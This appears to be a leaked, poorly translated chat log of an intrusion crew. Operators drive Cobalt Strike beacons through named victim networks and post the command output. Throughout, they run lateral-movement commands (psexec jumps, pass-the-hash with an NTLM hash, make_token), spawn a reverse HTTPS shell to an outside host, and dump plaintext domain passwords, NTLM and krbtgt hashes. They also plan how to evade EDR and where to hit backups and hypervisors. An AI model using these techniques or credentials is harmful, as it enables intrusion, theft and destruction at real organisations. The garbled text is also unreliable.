beacon> shell wmic /node:10.0.61.69 logicaldisk get description,name [*] Tasked beacon to run: wmic /node:10.0.61.69 logicaldisk get description,name [+] host called home, sent: 85 bytes [+] received output: Description Name Local Fixed Disk C: Local Fixed Disk F: Local Fixed Disk N: ``` ``` beacon> shell net use * \\10.0.61.69\C$ [*] Tasked beacon to run: net use *\\\10.0.61.69\C$ [+] host called home, sent: 56 bytes [+] received output: System error 53 has occurred. The network path was not found. ``` :thinking:is this what we have? Example `execute-assembly /home/user/TOOLS/SharpSharesNG.exe shares DMZ-HyperV```` /* * SharpSharesNG --max-threads 10 --output console|/path/to/file * * ips - equiv ips ad * ips 10.0.0.1 [--os-detect] [--alive] * ips 10.0.0.1/24 [--os-detect] [--alive] * ips HostName [--os-detect] [--alive] * ips [ad] [--os-detect] [--alive] * ips [list] c:\users\hostlist.txt [--os-detect] [--alive] * * * shares - equiv shares ad * shares 10.0.0.1 [--os-detect] [--public-only] * shares 10.0.0.1/24 [--os-detect] [--public-only] * shares HostName [--os-detect] [--public-only] * shares [ad] [--os-detect] [--public-only] * shares [list] c:\users\hostlist.txt [--os-detect] [--public-only] So you'll have about 2k matched armas and then let's map the armas to 10 per server. Now the goal is to map the rest of the servers, all their network drives and leave them untouched except for the dk and dns servers. ``` all network drives on the current servers are mapped the rest of the servers are mapped. now do this, it's like this: 222 of 277 servers are mapped? how many servers in total are mapped? where no session is mapped? if pipe, nothing is mapped if regular dll`` ``. 
Shares for CAUSQLCL8wx: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ClusterStorage$ ******* COMPLETE ******* ``Where ??? there either ``` The network name cannot be found. ``` or ``` The network path was not found. ``` it gives out after a while, the change of codes didn't help ``pipe netjump no`` `` Shares for Av-DMZ-HyperV: [--- Unreadable Shares ---] IPC$ `````` VERSASQL: 10.0.53.98` `` Arrived under other creeds no, from another server under other creeds - everything is the same itself now I will try another one... by the way as far as I see there is a lot about hypervi... these servers hold images - if you don't deal with them, the grid is likely to recover in one click is out of my 55 not attracted? is it out of 200? 
``` check if another host is pinging this ipac which may be a cluster storage which will have the same ipi as the "normal" serverwhat is the overall progress? ok check from another point he does not even have admin$ change the server and accesses you have looked from one server sharina how is it try from another point no session arrived, the delta is loaded what to do? if the server only ``t Shares for DMZ-HyperV: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ClusterStorage$ `````` ``when jampeon is sometimes more effective, not only psexec_psh but also a regular psexech is pretty solid where it doesn't start - you can try it with pipes ``The servers do not overlap? yes see these two puffingThe second river is flowing185....113 the first is mine and the user7 and what is the second coba? we are each 55 pieces and in 2 cobas work out the first 200? there is one coba empty50/55 I have about 50% what is the overall progress? and the second? 
These? leeandmason.com L&M Domain 107.0.14.250 tl 127kk STOPPED 2fa need hot sessions `````` pngc.com pngcdomain 205.236.0.43 user4 238kk STOPPED no valid accounts ``The first one is actually a town of some kind. Why them? Can I have these rewritten, please? madison.il.us gisnet1 71.14.246.203 redwoodcity.org redwoodcity.org 76.14.0.148 canalbarge.com canalbarge 50.233.57.77 ``I've got about an hour and a half here for sure, I've got about 30 minutes to start thinking,`` I've got 2fa somewhere if you need it,`` no luck yet? 
the tech guys should study in any case, for access to echi or other virtualization, and generally juicy data in the form of backup regulations, network maps and the like9 of 10 what will there mfat will hit in the carbon cloud well it's technareid browsers is a bit of a wanker, i understand, but speaking of carbon, there are cases where the execution of any psch code in the network for example carbon by policies is perceived as an alert and sends a note to the admins Find the creed from carbon= ) well then let's start with the "task", what's the priority right now? i think the study of the machines of technicians, it's probably the usual no-jouz, copying files, psekzek_command is quite a realistic solutionSo why "go" on the net? you have segments that you can not see? i do not quite understand how to go on the net Look at it as a useful practice "silent" work otherwise there is no way = (the better the less tascas/randall/unsigned egos and the like then alas, carbone writes any anomalies, not only smallwar but also not just "out-of-the-box" invectives it's a cloud SOC[ ](https://mediaeveryone.com/group/evo-com?msg=dTHei4MCgBJfC5NpX) I think not@tl1 have we started a dll here at all? if not - you can try psch pailoadych for protection functionscarbon even though EDR has a greater focus on whitelisting and account controlif you are ready today to urgently hack work on this network - I do not see the criminal in spreading dllTo see processes do not watch remotelyThis carbon stands everywhere, it is not even worth trying to slug the dll?nptywtf `SUDIGYFSDO^F&W67rfuSYRG^U67HGH `so you do not have dns and ldap anything in the domain + you do it from the dedicates?) give your hell, I have it removed in zeroinds better not touch, there is most likely a detector on ntsyutilad better reset, I clearly obsolete server without cb.exe in processes, there will be a chance to jump into the network there is a carbon` EVO\radmin 3v0r3port` sure it's valid``. 
Get list of DCs in domain 'evo.local' from '\\AZ-DC-2.evo.local'. CHEECH.evo.local [DS] Site: HQ2 AZ-DC-2.evo.local [PDC] [DS] Site: evoAZURE HQ-DC-2.evo.local [DS] Site: HQ2 HQ-DC-1.evo.local [DS] Site: HQ2 AZ-DC-4.evo.local [DS] Site: evoAZURE ======================================================================== [*] EVO\Administrator [*] EVO\Administrator Tmpl [*] EVO\bduong [*] EVO\bkruse [*] EVO\bplehal [*] EVO\bpratt [*] EVO\cbbackup [*] EVO\ceaton [*] EVO\dhcpreg [*] EVO\evoadmin [*] EVO\hdryden [*] EVO\iso Reset123 [*] EVO\isoutsource [*] EVO\jcourtney May12011 [*] EVO\landerson [*] EVO\lsoto [*] EVO/MerakiVPNSrv [*] EVO\mgentry [*] EVO\nkiger L1m3_Gr33n [*] EVO\qlyons [*] EVO\radmin 3v0r3port [*] EVO\sborn [*] EVO\SBS Backup User [*] EVO\searle [*] EVO\ServerAdmin$ [*] EVO\spiceworks [*] EVO\svc_mechanic [*] EVO\SVC_PRTG [*] EVO\svc_sqlmnt [*] EVO\svc_sqlslave [*] EVO\tadmin evo123 - disabled [*] EVO\tfield [*] EVO\tmusselwhite Guide12319 [*] EVO\ups [*] EVO\veeam_vss [*] EVO\vipreadmin [*] EVO\vpnadmin ======================================================================== [*] Found users in enterprise admins [*] \Administrator [*] \iso [*] \isoutsource [*] \jtizon [*] \manuelw [*] \MerakiVPNSrv [*] \nkiger [*] \qlyons [*] \sborn [*] \ServerAdmin$ [*] \vipreadmin ======================================================================== scanuser abc123$ - VALID FOR DC C:{Windows\system32> net localgroup "administrators" Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Administrator EVO\Domain Admins Roscoe The command completed successfully. ``To minimize pvshya specially for you built a huge c# tulkitdotnet does not hinder AMSI and does not watch as pvshocheen please stop using verashell as much as possible where you can make do with dotnetblin, yeah.... I mean SharpView, not PowerView. stop what invoke? 
I've already written about both vpc and vpshshehe we'll find the logs from Misha, we started with him today it seems to output all in a row,just invoke-uchuchuchtuchtuchtuchtuchtuchtuchtucht if the user is not set, then it looks like something searches forhis error kicks out how so? sharpview does not search? not (sharpview know how to look for users too? super! Yes, you've got a Sharp sniper?hence it should "be able" to read them because it accesses domain controllers logsand you have to run it only from domain admin contexttry sharpsniperit's a good time to test it)we were looking for something like this, i think we found it on veraschel, search for keywords like network, admin, tech, etc. and allocate them from ad_users and use this tool to find their pc where will be valuable information about the network, just the same should be information about edr, backups, etc. in the problem "search for technicians "actually helps find nts assigned to users, gave you this stuff?``` https://github.com/HunnicCyber/SharpSniper this is how you check if the current credentials are rolling on the remote pkvs make yourself a token lA for the supposed machine second - respectively from kmd through >shell@tl2 prompted you)or wmic /node:10.225.10.200 process briefs \\10.225.10.200\c$test the easiest way to check access to the file system1) will not be better - because similarly dirty load will be generatedGood friends, please. We now and in the future will be very often confronted with WPNs. 
I remember them as a whole + - by heart on the config and everything else, but in order to make it more convenient for everyone - please make a separate thread on the forum, where will lie installers VPN, guidance on finding config files vpnov on different operating systems, and other related to this type of access to the same ``` jump psexec64 10.225.10.200 https ``` pre-generates a dirty binary that could trick even a regular winndef, such attempts are almost guaranteed to create a securiti event-how to check here?) I think you already know what to check this way: ``` jump psexec64 10.225.10.200 https ``` wrong, because this token might not get access at runtime by itself, use primitive tokens, which only fail if access is wrong, or use make_token ```. pth datacenter.local\adm.brodan0 06290576382001cd1da4c942e9fa0ca6 ``I'll repeat the last time[ ](https://mediaeveryone.com/channel/general?msg=yHwrHWhtKpBocnuAK) let's get the passwords out of the vannott and move on to the eighth[ ](https://mediaeveryone.com/channel/general?msg=K4jfy6RjSGBrCRC2E) 2[ ](https://mediaeveryone.com/channel/general?msg=vgKtrJmq4LPeLYNQh) 1 or where is it from? they also have YES?) typo ninth) chetu.comdom.helpathome.com + found the "silent" servers? dom.helpathome.com - @user9 and @user1 saiglobal.com - @user8 @user4 finish his (check.on.com), then joins saiglobal.comfiredi.com@user8 domain? he'll do it@tl1 passni saig @user8 then me and @user1 finish mywas 6 people - 3 grids) he's a priority too and finish them both to myself in dom.helpathome.com)[ ](https://mediaeveryone.com/channel/general?msg=cMScshjiqrspPvE3W) but @user8 says no sessions to him, which one of you is lying? it's for the future, when you make a listener for a pass you specify it + 443 port there domain saw beacons at https?):wink:where does it go where?When you do `spawn misha`pass - pass it to the domain? by the way + and notice that there and the ip is different and not the one you connect to the right do you see? 
open and look at your https nobody even looked at their listener in the coba) you asked the coba where the sessions passwhat domain?[ ](https://mediaeveryone.com/channel/general?msg=iPcyxH5o42hFED4T2) that's the coba's ip, and I need a domain, different domains see different trusts from 19 still enough of the colleagues above) there are two of them, right? what trusts are there?.161.126.162 gotovkobu where to pass the session or work from those that remained from there need to do, the other trusts + hell + av + backups then allocate 1 person on saiglobal.com all at the dekat all without a case now? dekat rebooted00 write plz how many trusts in domains domains.helpathome.comhappay.inn so please tell me what networks are up and running now?[ ](https://mediaeveryone.com/channel/general?msg=HrfgL9vcyE6NR2MMX) .[ ](https://mediaeveryone.com/channel/general?msg=kZc6hgGxJF65QRDgg) .@user8 where are you going? yes-all the groups? sec)+@tl1Add me to them herehare.add me to the confines of Stalinymm, and 1 that did not fly there not everything is so simple3 in the process until you can fall on the first 2 to the others, the third is still waiting? still a session flew in) or have not yet connected) but I think the domain disconnected (yes, I work with her now - my yesterday red do not touch it + 1 + that Dc-01 and this session is one grid?strange thingd1 came) yesterday's sessions or yesterday's? 
either pass each other in the cob sessions or give access to a partner, there as conveniently as possible take one for two are expected 3 pcsIn both eyes:flushed:okomonitor yesterday's cobFriver.local two sessions - very hovering-sessions alive any?so good:sleeping:good morning)Good afternoon:space_invader:Cheerful morning)Quiet b\quiet night thank you all for todayThe important thing is that the mistakes are passed and the result is thereMolodyodtsy and took two DAD to tomorrows vps and dedikaminakosyali)until today to tomorrowtoday on the total time is already very much let's finishtakahe good option to look for svoith and check on the lpe we have in the network services, we check them in the case in situations to sort out theoretical up to search for the name of the dog admin as a password) well, and if it did not pass?)) poured in the archive, which was in the requirements for the reportitsituation is theoretical)ftp sploitvoprosy almost all of us today do not have polzaki la no credits (nowhere at all) go up does not work logically need to scan the network, look for 7/xp/sql and so on - and sploat them let's say the kerb is still unhackable keyloggers, fakelogons.... Inway I might have missed something, but that's pretty much it. what else interesting things can be done in such a situation? so, all poured files with hell and other things? yes, i checked on 4 phones at home - does not work on any of them tomorrow by 15 who do not know vpinp.net ``` User is not LA creeds from browsers AD info Checked the non-ABA test domain Got the LA\DA\EA lists sitifno ran the dll Checked files on the machine that contain passwords. Checked ad_computers for passwords. trying to raise permissions (2020-076) mimikatz value::creds session crashed ``We've got a cart that's not working.helpathome.com ``` The user is not LA browsers creds AD info Checked the non-AB\test domain Got the LA\DA\EA lists sitifno ran the dll Checked files on the machine that contain passwords. 
Checked ad_computers for passwords. trying to raise permissions (2020-076) Share-Finder (process died) GPPP-Pass Invoke_Kerberoast mimikatz value::creds Ping machines in the domain Portscan to standard ports session crashed session is back kerb hash reset - started to check for validity checked user - yes, password has not changed for a long time tried to check validity via net use - got syntax error session crashed ``@user7 didn't you get a session? collected information from the machine adinf, sylbelt, sharpweb, rubeus kerb, invok kerb, tried no gpp (found nothing) ran through the folders. went from ad coputers to windows 2003 and HP. pinged them and made a list Alexei connected and on one of the vin 2003 machines he brought up the system with the YES Credentials filled in the dll and started it up. took hashes from the dc started to complete the list of servers, decided to make life easier leha script and fakal doc over which sat all this time as got hell infogroups were, the current user does not enter them anyone had such a situation with LA as I described? that there is no direct reference to the current user, but there are other groups? Received session: UserName: forstern (not a local admin) HostName: SHO-LT-4726W10 Domain: bnpmedia.com Got it: AdFind DCs DA EA LA (SHO-LT-4726W10) SeatBelt WinPeas Kerb-hash (Rubeus) 1 password from browser (SharpWeb) by MSOutLook It didn't work: CVE-2020-0796 - session in system context did not spawn, no error Net-GPPPasswords.exe - it parried, it did not give me any credits Invoke-Kerberoast.ps1 - gave an error that there were no users for kerberoast smb_login - ran MSOutLook password on the current subnet, no machine came up SharpChrome - didn't give out any credits Did not have time: MS_17_010 - Built OS: Windows XP, 7, Server 2003, 2008, had time to ping not all, planned to run ms_17_010_psexec on successfully pinged. Also sorted the servers into groups. 
OpenVPN and ScreenConnector configurations were found on the computer. OpenVPN could not be deployed on the harddisk. `````` *CHETU.COM unchecked AD info removed net accounts /dom net group "domain admins" /dom net group "enterprise admins" /dom stripped the invoke-kerberos and gave them to the brute force SeatBelt + winPEAS CharpChrome - pulled out 10 passwords that fit the length of the domain requirements. Raise the privileges did not work, in spite of the not updated Windows From ad_computers I checked out the server computers and added pings to the list. Found a backup file OneNote passwords.one (On 8-27-2020).one on the system. Prepared a list of interesting files on the FS (unattend and office docks)`` just the first line of the message to the "report" the name of the confiTo know where there is a situation write more immediately on what grid plizharrau.in ``` 1) Take off the browser Credits Chrome and then all the rest 2) Take off AD_Users 3) take off YES 4) removed local 5) Remove mimic 6) Collected password files 7) Halfway through the system 8) Started looking at the network for further movement 9) Sorting data 10) Preparing reports The connection is lost. ``` friver.local ``` Helping User7 1) Checked subnets 2) Chose a subnet, checked on ms17 found one car, threw the session in the armitage 3) Took down hashdam and mimic. 4) Found YES. 5) Got a dump from DS. ``` https://mediaeveryone.com/channel/general?msg=8Wui2GjymD9ouq2fJобмен experience peculiar) suddenly someone will have good thoughts on the problems of another let everyone understand the situation on the grids write directly here where to write? \For each of your grids write overall score for today, what's up, what's done, what worked, what did not work, questions, let's probably summarize the results todayhodu too long search, missed the opportunity to that another kobu try to `s? 
AHyHax beacon> spawn https
ahyHax beacon> beacon https

ap.panavision.com
==================
DC: SYD-DCON-02 SYD-DCON-01 AUS-DCON-01
EXCHANGE: SYD-EXCH-00 AKL-DCON-02
SQL: SYD-MSSQL-01 SYD-APPS-02 SYD-ALMS-01 SYD-ITAP-01
FILE SERVERS: AKL-FILE-01 AKL-FILE-02 SYD-FILE-01 MEL-FILE-02
WSUS: SYD-WSUS-01
could not find host: AUS-RDSB-01 SYD-ITNET-01 SYD-APIT-01 - timeout SYD-APPS-01
HYPER-V: AKL-HYPV-01 SYD-HYPV-01 MEL-HYPV-01 AUS-DCON-02
PDQDeployService: SYD-PDQM-01
PRINT SERVER: SYD-PRNT-01
DPM: SYD-DPMS-02
??: SYD-ITMG-01 - orcestrator? SCCM / WSUS
often see other segments and 95 more servers which are not distributed

na.panavision.com
=================
DHCP: ATL-DHCP-01 NYC-DHCP-01 WDH-DHCP-01
DC: DEN-DCON-02 DEN-DCON-01 WDH-DCON-02
EXCHANGE: PNA-BURDC-02 PNA-ALBDC-01 NOL-DCON-02 PNA-WHEXCH-01 PNA-WHEXCH-02 GBL-EXCH-01
MSSQL: WDH-SWSS-01 DEV-WIND-01 SQL-WH-03 GBL-SWSS-01
VEAM: WDH-VEAM-01 WDH-VEAM-02
SCCM: DEN-SCCM-01
WSUS: DEN-WSUS-01
FILE SERVERS: TOR-FILE-01 VAN-FILE-01 NOL-FILE-01 WDH-FILE-02 CHI-FILE-01 WDH-FILE-01 DAL-FILE-01
Terminal Server License Servers: GBL-RDSB-01
SQL: PNA-SQLREP-02 GBL-SQL-01 DEV-MSQL-01 DEN-ESQL-01 DEV-MSQL-02 DEV-SQLM-01 DEN-SQLP-01 DEN-SQLR-01 DEN-SQLU-01 DEN-SQLA-01 DEN-SQLM-01 DEN-SQLS-02 WDH-WIND-01 WDH-WIND-TST WDH-PRNT-01 DEN-MDPM-01 WDH-NAVI-01
Hyper-V: PNA-HYPV-06 PNA-HYPV-01 PNA-HYPV-03 HWD-HYPV-01 GBL-HYPV-01 PNA-HYPV-04 PNA-HYPV-02 PNA-HYPV-05 BUR-HYPV-01 VAN-HYPV-01 NYC-HYPV-01 ALB-HYPV-01 TOR-HYPV-01 CHI-HYPV-01 ATL-HYPV-01 NOL-HYPV-01 WDH-HYPV-01 PNA-HYPV-CL
Sharepoint: DEN-SHAR-01 DEN-SHAR-02 DEV-SHAR-01 DEN-SHAR-03 DEN-APPS-02 DEN-PVSN-01 DEV-MSPS-16
RDS: GBL-RDSH-03 GBL-RDSH-01 GBL-RDSH-02 GBL-RDSH-04 DEN-RDS-01 DEN-RDS-02 DEV-MSGP-01
Disabled Servers: DEN-APPS-01 DEN-ENGS-01 DEV-GPER-01 ENG-WH-01X EREQDEV PNA-APPFS-01 PNA-RTRC-01 PNA-WEBAPPS-01 PNA-WHGP-01 DEV-MOOS-00
Nutanix AHV (Virtualization is no longer a complex layer of the IT stack that is licensed, deployed, and managed separately. Nutanix AHV offers a secure, enterprise-grade virtualization solution that streamlines operations): DEN-CMDB-01 DEN-DVOP-03 DEN-ECOM-01 DEN-EREQ-01 DEN-PDQS-01 DEN-RTRC-01 DEV-MIIS-01 EREQUEST GBL-ADFS-01 GBL-BIGS-01 GBL-MSDS-01 GBL-TMDS-00 PNA-WHSBX-02
Please check the name and try again: DEV-GPUG-01 GBL-SWAS-01 PNA-SP-01 WDH-OMSA-01
FILESTORAGE? (Azure Backup with antivirus): PNA-ALBFS-01 PNA-BURFS-02 PNA-HWDFS-02 PNA-NYCFS-02 DEN-STFS-01
HTTPD: WDH-CCTV-01
SolarWinds: WDH-SWAS-01
Request timed out: PNA-ATLFS-02 WDH-WDSS-01

```shell
adfind.exe -b dc=standards,dc=com,dc=au -f "(objectcategory=organizationalUnit)" > C:\Programdata\standards_ad_ous.txt
shell nltest /dclist:c360.losal
```

is@user1 @user3 catch it should be careful because it is quite strong floods I'll tell you this, 3 times in a row run, admins will burn the network load and throw everyone) server and user OS it checks the balls on each pc in the domain I was more about the algorithm itself performs two functions at once, if we start it from a user context and see immediately available ADMIN$ balloons - it means we are local admin there and can already move there if there are no such machines in the network - at least we get a list of available balls for reading, which may contain information relevant to upgrade privileges You understand how shuffinder works, don't you? and it's server subnets at this scale are better to scan /24.
So you need 20 domains, take off the ad_computer, ping the servers and connect the port? no, in 1 domain) in each domain?of the pluses, there is already YES, from the minuses there are still 19 trusts, I'll tell you when I runWe have automatic spoiling on such fruitovorov they pass you and see that you on 10 sessions in the cobs did not fructify, I pass @user1 @user3 sessions on the casexDseek ways to the cloud, look for the cradleshttp://arhangel.ru/fortune/online/taro/maps will prompt the right pathalgorithm is clear, but if the AV will be cloud and his server is not in the network?)hell certainly do not need to remove, but you can)well algorithm is clear, go fix the same, but is it enough for you?)portscans sorting this is it allDemolish hellDemolish hellThat's what we were doing on Saturday So, let's move on to the practice of networkOopsy made a mistake, let's move on )who and where?) We haven't worked with them for the last 30 minutes. Why did you kill all the sessions? Administrator:500:aad3b435b51404eeaad3b435b51404ee:2bd07805e537f32fe65cdb7ec1ac64c6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ``` ``` * Username : bstangea * Domain : RTPCO * NTLM : f13d2f88fdf2a0970db1ece9ce90bc57 Local Group Memberships *iDRAC-Admins *Netmon Users *StorageAdmin *VMWare-Admins *VMWare-Admins-Alloy *VSA_Users Global Group memberships *VSA_Admins *Test_Alloy *IT *SQL Server Admins *testgroup1 *RTP-Admins_Ent *TestShare *RTP-IT-Admins *Domain Users *O365_Sync ``I just got the second one13 minutes ago 1 flew in. Is there a second one? If it doesn`t come in it means the coba is blocked and 20 minutes ago Kasya can`t see it```. 
====== AntiVirus ======
Engine : Windows Defender
ProductEXE : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
Engine : Kaspersky Endpoint Security 10 for Windows
ProductEXE : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Endpoint Security 10 for Windows SP2\wmiav.exe
ReportingEXE : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Endpoint Security 10 for Windows SP2\x64\wmi64.exe

I thought it wasn't mentioned out loud, and vindef octo it's clear where avp visit is from. Just if it's related to kasper by any chance? I noticed it later, well kasper [ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=SHJHSBqfenpxjBRxe) it's about?

3356 576 LockApp.exe x64 1 RTPCO\amcnally
4120 892 avp.exe
5244 4120 avp.exe x86 1 RTPCO\amcnally
4848 892 securityHealthService.exe
11600 4340 MSASCuiL.exe x64 1 RTPCO\amcnally

only the cassay process is not red votsimantec and cassayan is still the same

[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] SISIPSFileFilter.sys Found
[+] 1 EDR Products Found!
======================
| Vendor Information |
----------------------
[+] Symantec Found!
``` ``` 4292 892 KaseyaEndpoint.exe so when you were sitting on 1pc all together and tried to get into the trust it was unsuccessful they clean up anchors, sessions, in general everything they can clean up)[ ](https://mediaeveryone.com/group/saiglobal-com?msg=s4LNHXhgaMfybMpmb) another thing, so even if they brought a cob from outside, pass it on their own what's the point in it?@user8 reread the message above or in the same and stay in the same and from that koba already on the trusts in lycznyetuda fuck the servervot there is a koba from which we have not worked with this domain yet i told you about it and a good thing to try it was necessary to ping from the server where you want a session 1 koba that can get a session and so the question was you do not have a session on the inbound router and you do not get any sessions from anywhere and now you sit on the same server and traffic flies to your domains and other things at this point there sat their IT guys and watched the traffic if you all crowded on one server and each had a session analyze the traffic and cut off segmentsadmins do what?when you raised a fuss in the network the last time we did it for a week, we were scattered across the trusts+[ ](https://mediaeveryone.com/group/saiglobal-com?msg=8gSx7ucdX2qwNQcZS) everyone had active sessions on the cob? and from there to personal spavnit there to get from the same test .66 so if we from all personal cob were there anyway, maybe it makes sense to try from a cob that we have not touched yet?how copied and to which servers did it have time to run? so mb palyat not dll and koba?) give me a bin i will make another cryptohesh change from rebuildadrecreate, re-cryptadlki chopped av, something will change from re-create? user1 got a session, from hell got a server, pinged it pinged the servers that are pinged spread our dlls and run right? 
domain where to passI'm also the last one and fuck up here already finale will give you another session if there is a back, pass the user1 - he will spread us across the servers, yes, fucked up.... how did you try? right, while trying to spread it flew away so i understand no one outside the current machine, there are more backs? our sessions flew off...so far only the dog is getting fucked up :thinking: if you're pinging the name and catch 100% loss then there is a chance that the server just turned off the replica to the ping command, or fv interfere or other reasons what else do not do? if no yuz - access dendied, user or password wrong immediately do not touch, you're asking about 445, so there is a variant, or you confuse me already?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=XmYaJLHszyi2pttqa) if you read the errors, you won't lock[ ](https://mediaeveryone.com/group/saiglobal-com?msg=Z5zKpqTJrL9hpr8S5) if you get a dns request that he does not see the name, how do you even want to interact? net use with the credentials? I can't ping 10.225.10.200, it's datacenter.local, how do I even communicate with it? Just to be clear. ``` beacon> portscan 10.225.10.200 445 icmp 1024 [*] Tasked beacon to scan ports 445 on 10.225.10.200 [+] host called home, sent: 93245 bytes [+] received output: Scanner module is complete ?and 445 is open? if the domain is not pinged is it possible to remove something from it? in all other we have? above file update the visible trastnu if visible by itself it is already possible but it is pinged and possible so if c360 in quarantine, is there any sense to go to it? do not kill this live make_token saig.frd.global\svc_actifio B0b@f3tt ```saig.frd.global\what domain is it? is it not active (can we make tickets from one domain to another? you should check when it has a pass) and is it on or off? if we have ``` 502 krbtgt 21dbd0c360e58ac61e4ae83052f1c582 514 ``` what can we do about it? 
Remind me please) other domains will be here soon and they started in orderdxink was taken on tuesday took a user who has not changed the password since last month in the start domain (just checked), and in c360 apparently changed the password))) they will not just sit and wait)[ ](https://mediaeveryone.com/group/saiglobal-com?msg=ZDZp8BjrNibbDXpfF) logically, since the admins knew about us full flight we changed passwords from DAudal ad_user above plesloknet through shell dir \faque.rex\C$ if you check the validity of the user it will not lock in case of what? fuck the user did not finish downloading in legalco and c360 also can not get not only him well they obviously felt the fuck and closed the data center from here and got @user8 from yesterday in the domain?

beacon> shell nslookup 10.225.10.200
[*] Tasked beacon to run: nslookup 10.225.10.200
[+] host called home, sent: 53 bytes
[+] received output:
*** Request to UnKnown timed-out
DNS request timed out.
    timeout was 2 seconds.
Server:  UnKnown
Address:  10.225.12.200

DNS request timed out.
    timeout was 2 seconds.

The old one should not be overwritten. It would be a good idea to update hell info on the current domains cheknitednsync pinged as well as c360 and almost everything in quarantine 13 instead of 19)

dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:59:39 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]

Why?
Yesterday @user8 was working with him how long ago, in the docs were the sessions were re-translated? @tl1 Well what is it? Maybe just datacenter? There are no others, in fact it turns out the same places from where last time you hit?

beacon> shell ping datacenter.local
[*] Tasked beacon to run: ping datacenter.local
[+] host called home, sent: 52 bytes
[+] received output:
Ping request could not find host datacenter.local. Please check the name and try again.

beacon> shell ping 10.225.10.200
[*] Tasked beacon to run: ping 10.225.10.200
[+] host called home, sent: 49 bytes
[+] received output:
Pinging 10.225.10.200 with 32 bytes of data:
Request timed out.
Request timed out.
[+] received output:
Request timed out.
[+] received output:
Request timed out.

Ping statistics for 10.225.10.200:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

AUSYDHC-ESP-DC1.legalco.holasal guys pinging it can be worked with via bind_pipe or other tulamia I remember that some domain is completely closed from the outside in terms of sessions looking for faerai admin... if you can't find it there is an alternative solution but not very good... Theoretically our .exe can even go under it, but it's a lottery and the chances are not in our favor. @user3 from other domains that guys are now sitting in - also past? legalco.local servers and the domain is not pinged if you fuck with it directly))))) and dll is technically mmm also a binary) so disable like sofos? final binaries) dll of the binary? it will kill our binary processes and drop them from the network before it worked quietly and it's not much of a hindrance. the main problem i see is the phaea agents i mentioned above looking for techs, avers, backups. everything is standard, we just need to "finish" to the mind what we have here by tasks?
ok, and then already portaskankilni dllkuvinlogon then my borders in the process do dllkoy datacenter here i'll take a global, dellkoy make datacenter myself and from there portaskan fuckinu, ok? tolerable it's not worth it to multiply connects and move around. how gentle is portscan? @user1 we're trying to be gentle, see how cobalts fly off...ok now we'll work with user3 in user7's coba, pinging user3's coba is 100% loss before you pass it on others - ping out gently icmp won't be an alert probably if https connect is flashed the only way to get out is by pinging, right then and there. you also blocked me from the user3 coba the other day it's not even trying to get your coba into that network anymore. you andpacific probably you'll get a firewall. it's not a big deal to work with someone else's coba.204 from the session saig.frd.global pinged myself (firedi.com) and got a loss of 100%Very careful in datacenter no abrupt moves and move "within" the domain, only from the point of entry and gently, ok jump through others who do not see the domain all so far I'm not even talking about beacons - it's by itself, we don't know yet where the datacenter runs.... is datacenter.local - highest priority+@user1 @user3 confrm please+947ya+94ya+9ya +everyone understands what exactly needs to be prepared and find out? [*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (regbest.com:443) ``minutes to regbest.com:443 from there we'll take it apart++ can we pass it on to the right trusts yourself? here in this domain i have beck checking beck, if off - today we'll take on other thingsWill the others? i have datacenter sagged for 34 hours, saiglobal for 20 no one in the whole forest has a session left, right? 
passloft.com + stormname.com:443 pass me + firedi.com:443 it's from a subdivision. Mail espreon.com passloft session at slypad.com:443 @user3 your subjective opinion is it some kind of separate company or just a "department" legal? what are the ad_users mail there? legalco.local for adusers 1181 i need all the data we have on domain administrators and network engineers browsers/notes/documentation/keepasses/graphics - anything you think is at least relatively relevant and less than 4 years old. @user7 similarly for users and cars. @user9 look for virtualization servers, identify key techies in your domain (sysadmins, etc.) and look for their machines. c360.local 1. windef (couldn't find more entries, but need to check) 2. categorized 4. No all servers are spinning on wm, including both dksaiglobal tozhen standatd 6k users, the rest (which I worked on) much less at my datacenter dead. @user8 scan more ranges of your domain at 80/443/445 for machines that are not part of the domain (NAS probably here - they are outside the domain too) the key domain - datacenter where we close the server segment is fireeye which today we need to solve a SERIOUS problem who works with large major domains with a large number of users - write me fine, deal with it then. all you said in the plan i'll scan everything, it's just that from my coba i couldn't get into the hr...za...
the other day in general, the session to get, from there could not ping myself, worked from koba @user3, now go there, long loading its destination) name of the domain datacenter as if hinted at) yes, already looked it uhm "egress routes" such if you can call it that) more, there are everywhere server windup simple you need to see if "other" servers are visible from where the losses from these two-servers of the same group usually see each other, even if part of the group is closed to the rest of the segment. USHDC1-CSPWEB18.datacenter.local USHDC1-CSPWEB22.datacenter.local. But there is a server with this prefix, which is in the visibility area USHDC1-CSPWEB. You do not see in the routes mostly servers with the prefix now look. magic if so - see what's on the file system and what data are on the drives + list of processes of servers in this group to form a correct impression. I guess you just switched the concept of NAS as a file storage? occasionally Very occasionally. but it would be a neutered sevens or something like that in terms of identification. Presumably nas: A ridiculous assumption, no offense. us - aka NAS - Network Attached - Storage. NEVER identified as windows server 2012 I take it we are everywhere windup? the hardware may not let icmp packets through but it does let various administration systems through. 100% Loss: - most likely behind the hardware, scan them to 80/443/3389/5900. will see - I'll tell you what the tascii full domain composition. datacenter.local is one of the key domains with critical data. Download the categorization of datacenter.local 1. FireEye, 